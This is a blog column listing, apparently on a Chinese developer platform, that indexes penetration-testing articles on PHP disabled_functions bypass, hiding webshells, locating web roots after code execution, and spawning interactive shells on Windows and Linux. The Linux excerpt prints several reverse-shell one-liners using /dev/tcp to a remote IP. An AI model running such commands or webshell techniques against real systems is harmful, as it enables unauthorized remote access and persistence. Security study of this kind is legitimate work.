首页
学习
活动
专区
工具
TVP
发布

Urahara Blog

专栏作者
34
文章
41587
阅读量
25
订阅数
Some Linux Hacking Tricks
There is always a method here is useful for you to penetration test :)
风流
2019-12-11
5380
PHP Disabled_functions Bypass
将生成文件上传至extension_dir目录下,若extension_dir目录无写权限则可写入任意目录用../../来绕过并调用。
风流
2019-12-11
1.2K0
Some Ways To Create An Interactive Shell On Windows
在Twitter看到一种在windows下反弹cmd shell的方法,其实重点不在于反弹shell,而在于这种文件写入的方法可以运用到某些场景中会很方便,比如RCE没有回显时,就可以通过写入一个反弹功能的可执行文件获取到shell,但是你是如何写入该文件的?当然你可能会通过echo一个有下载功能vbs脚本,远程下载该可执行文件,或者powershell,或者bitsadmin,或者certutil,那么这里再介绍给你一种方法将可执行文件直接echo进去! PS:如果小伙伴们还有好的方法可以交流一下! Cr
风流
2018-06-07
4670
Using get_defined_functions To Hidden A PHP Backdoor
webshell隐藏是渗透当中一个很重要的权限维持技术,目前也有各种各样的隐藏方法,pen-tester的思路也越来越开放(weisuo)。这篇文章主要记录一下利用get_defined_functions()来隐藏webshell的方法,不是什么新技术,但也值得摸索。 关于get_defined_functions()就不在这里介绍了,大家直接去翻官方文档即可,这里看一下还函数的执行结果应该也能明了。 image.png 以下是一个该函数在webshell里边利用的一个思路,主要是可以隐藏危险函数字符
风流
2018-06-07
5730
Some Ways To Create An Interactive Shell On Linux
Bash $ bash -i >& /dev/tcp/192.168.68.206/2333 0>&1 $ exec 196<>/dev/tcp/192.168.68.206/2333; sh <&196 >&196 2>&196 $ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | while read line; do $line 2>&5 >&5;done $ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | wh
风流
2018-06-07
8490
一条命令找出系统web路径
​ 平常渗透过程中,我们可能利用远程命令执行漏洞反弹了一个shell回来,但是为了方便操作我们可能需要写一个webshell到目标服务器,但是如何才能在一个系统里边快速的定位到网站的绝对路径呢,如何才能在标准化系统中通过一条命令快速实现这一点呢?我不知道小伙伴们通常用什么样的方法,这里给大家介绍几种方法。 方法一 :打开web查看源码,复制一个特征字符串,然后替换进下面命令的htmlString搜索之。 Win :findstr /s/i/n /d:E:\code\xampp\htdocs\ /c:”htm
风流
2018-06-01
1.2K0
没有更多了
社区活动
腾讯技术创作狂欢月
“码”上创作 21 天,分 10000 元奖品池!
Python精品学习库
代码在线跑,知识轻松学
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档